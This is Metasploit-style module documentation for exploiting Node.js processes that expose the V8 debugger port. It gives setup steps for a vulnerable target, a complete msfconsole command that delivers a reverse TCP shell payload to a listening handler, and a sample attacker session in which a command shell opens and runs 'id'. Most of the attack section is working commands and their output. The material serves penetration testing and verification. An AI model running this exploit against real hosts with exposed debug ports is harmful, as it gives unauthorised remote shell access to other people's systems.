## Vulnerable Application

Current and historical versions of Node (or any JavaScript environment built on the V8 engine) ship this debugger functionality, and a process is exploitable if it is configured to expose the debug port on an untrusted interface.

Install a version of Node using any of the normal methods:

- Vendor: https://nodejs.org/en/download/package-manager/
- Distro:

  ```
  sudo apt-get install nodejs
  ```

Alternately, use the standard Node docker containers as targets:

```
$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
```

(Others at https://hub.docker.com/_/node/)

Tested on Node 7.x, 6.x, 4.x
## Verification Steps

- Run a node process exposing the debug port:

  ```
  node --debug=0.0.0.0:5858
  ```

- Exploit it and catch the callback:

  ```
  msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit"
  ```

  (If using docker hosts as targets for testing, ensure that the LHOST address is reachable from the container.)

Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity (such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
## Scenarios

### Example Run (Node 7.x)

Victim:

```
$ node --version
v7.10.0
$ node --debug=0.0.0.0:5858
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
Debugger listening on 0.0.0.0:5858
>
(To exit, press ^C again or type .exit)
```

Attacker:

```
msf exploit(nodejs_v8_debugger) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 127.0.0.1:5858 - Sending 745 byte payload...
[*] 127.0.0.1:5858 - Got success response
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
id
(redacted)
```